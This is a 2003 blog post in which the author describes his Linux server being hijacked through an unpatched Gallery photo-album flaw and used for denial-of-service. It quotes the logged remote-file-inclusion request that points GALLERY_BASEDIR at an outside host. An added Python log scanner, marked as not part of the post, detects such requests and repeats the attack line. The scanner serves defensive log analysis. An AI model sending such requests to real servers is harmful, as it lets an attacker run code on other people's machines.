joegratz.net

May 28, 2003

*growling noises*

My linux box was hacked, allowing whoever did it to run some perl script (vb.pl) which ate all of my CPU and bandwidth (undoubtedly for some nefarious purpose) until I noticed. Fuckers. Happily, the process was running as www-data, so I’m probably not rooted. My apache installation, I admit, was not as secure as it could have been. Really rather annoying. So, my photos, which were served from that box, will be down until further notice, since the easiest thing to do is to just not run apache at all, and put them on a real server someplace when I get a chance.

UPDATE, 31 May 2003: I finally got around to looking through my Apache logs from the attack:

200.51.40.34 - - [28/May/2003:02:22:24 -0500] "GET /errors/configmode.php?GALLERY_BASEDIR=http://ddos.front.ru/ HTTP/1.0" 200 289 "-" "Mozilla 5.0 [en-US]"

It looks pretty certain that a security hole in the photo album script I use, Gallery, was exploited to turn my box into a drone in a distributed denial-of-service attack. Yup, I failed to install a released security patch and got bitten in the ass. Two geek demerit points.
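As an added example (not part of the original post), here is a small scanner for Apache combined-format access logs that flags what the quoted entry shows: a query parameter whose value is an absolute URL, the way a remote file inclusion against a script like Gallery's configmode.php appears in the logs. The sample log lines are constructed; the first reproduces the entry above, the other two are made-up benign traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def remote_include_params(target):
    """Return (name, value) pairs whose value is an absolute http(s)/ftp URL.

    A PHP script that builds an include path from such a parameter will fetch
    and run code from that host when allow_url_fopen is on; GALLERY_BASEDIR
    in the quoted log line is exactly this shape.
    """
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r'^(?:https?|ftp)://', v, re.IGNORECASE)]

def scan(lines):
    """Yield one finding per request that carries a remote-URL parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = remote_include_params(m['target'])
        if hits:
            yield {
                'client': m['host'],
                'time': m['time'],
                'path': urlsplit(m['target']).path,
                'params': hits,
                'status': int(m['status']),
            }

# Constructed sample log: line 1 is the post's entry, lines 2-3 are benign filler.
SAMPLE_LOG = [
    '200.51.40.34 - - [28/May/2003:02:22:24 -0500] "GET /errors/configmode.php?GALLERY_BASEDIR=http://ddos.front.ru/ HTTP/1.0" 200 289 "-" "Mozilla 5.0 [en-US]"',
    '10.0.0.5 - - [28/May/2003:02:23:01 -0500] "GET /albums/index.php?set_albumName=trip HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '10.0.0.6 - - [28/May/2003:02:24:17 -0500] "GET /view_photo.php?url=www.example.org HTTP/1.1" 200 880 "http://example.org/" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Note that the third sample line is not flagged: a hostname without a scheme is not a remote include on its own, so the check errs toward fewer false positives rather than catching every odd-looking parameter.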

Incidentally, the host that contacted me is itself a cracked box, indicating that it was “hacked by redmax” and sporting this lovely message.

Fuckers.

1 Comment

  1. Someone got me with the same exploit. See the link. At least you won’t feel alone – hundreds of others were screwed, too. :)

    Comment by Josh Woodward — June 6, 2003 @ 11:21 am

Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial 2.5 License.